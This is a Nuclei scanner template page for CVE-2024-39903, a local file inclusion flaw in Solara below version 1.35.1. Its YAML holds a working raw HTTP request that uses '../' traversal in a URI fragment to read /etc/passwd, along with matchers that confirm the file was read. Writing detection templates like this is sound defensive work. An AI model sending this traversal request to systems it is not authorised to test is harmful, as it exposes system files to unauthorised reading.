Skip to content
Nuclei Templates

Solara <1.35.1 - Local File Inclusion

ID: CVE-2024-39903

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,solara,lfi

Description

Section titled “Description”

A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application’s failure to properly validate URI fragments for directory traversal sequences such as ’../’ when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.

YAML Source

Section titled “YAML Source”
id: CVE-2024-39903


info:
  name: Solara <1.35.1 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39903
    - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54
    - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-39903
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.109
  metadata:
    fofa-query: icon_hash="-223126228"
    verified: true
    max-request: 1
  tags: cve,cve2024,solara,lfi


http:
  - raw:
      - |+
        GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    unsafe: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: regex
        part: content_type
        regex:
          - "text/plain"


      - type: status
        status:
          - 200
# digest: 490a0046304402206fbe41b0f3c4c504fac67e6d9c3da550df41adacc14b16ceb6cb4c96061ee80e022025732838ebf0209d12087d9950a8c67fab8cfa5ff2ef20bbda302eebea8ca375:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-39903.yaml"

View on Github